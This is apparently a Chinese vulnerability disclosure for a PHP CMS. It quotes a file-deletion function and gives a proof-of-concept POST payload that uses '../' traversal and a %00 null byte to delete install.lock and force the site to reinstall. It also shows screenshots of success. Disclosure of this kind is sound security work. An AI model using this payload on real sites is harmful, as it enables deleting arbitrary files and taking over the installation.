### 简要描述:
2014年8月11日早上下载的源码 应该最新了
某处过滤不严
### 详细说明:
```
\protected\apps\member\controller\photoController.php
```
下的delpic函数
```
public function delpic()
{
if(empty($_POST['picname'])) $this->error('参数错误~');
$picname=trim($_POST['picname']);
$path=$this->uploadpath;
$lasts=strtolower(substr($picname,-3));
if(in_array($lasts,array('gif','jpg','png','bmp'))){
if(file_exists($path.$picname)) @unlink($path.$picname);
else exit('图片不存在~');
if(file_exists($path.'thumb_'.$picname)) @unlink($path.'thumb_'.$picname);
else exit('缩略图不存在~');
echo '原图以及缩略图删除成功~';
}else echo $lasts;
}
```
$picname=trim($_POST['picname']); 直接通过POST获取 没有过滤
最后检查了下后缀名 所以 直接截断就行了
Poc 首先注册会员 登录
POST提交 picname=../../protected/apps/install/install.lock%00a.jpg
到 http://localhost:8080/YX/index.php?r=member/photo/delpic
访问首页进行重装
[<img src="https://images.seebug.org/upload/201408/11152055a527ce5b61cac9332d9b2155d8166287.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/11152055a527ce5b61cac9332d9b2155d8166287.png)
### 漏洞证明:
```
POST提交 picname=../../protected/apps/install/install.lock%00a.jpg
```
[<img src="https://images.seebug.org/upload/201408/111521318dc915e4896dfbe8d6a906cc5f599f5d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111521318dc915e4896dfbe8d6a906cc5f599f5d.png)
删除lock成功
[<img src="https://images.seebug.org/upload/201408/111521575d6e599ae7723a5b7dafd8ce6bd846c8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111521575d6e599ae7723a5b7dafd8ce6bd846c8.png)
访问首页重装
[<img src="https://images.seebug.org/upload/201408/111522469906d994b376bcb454b4a4165fe0e977.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111522469906d994b376bcb454b4a4165fe0e977.png)
京公网安备 11010502034610号
暂无评论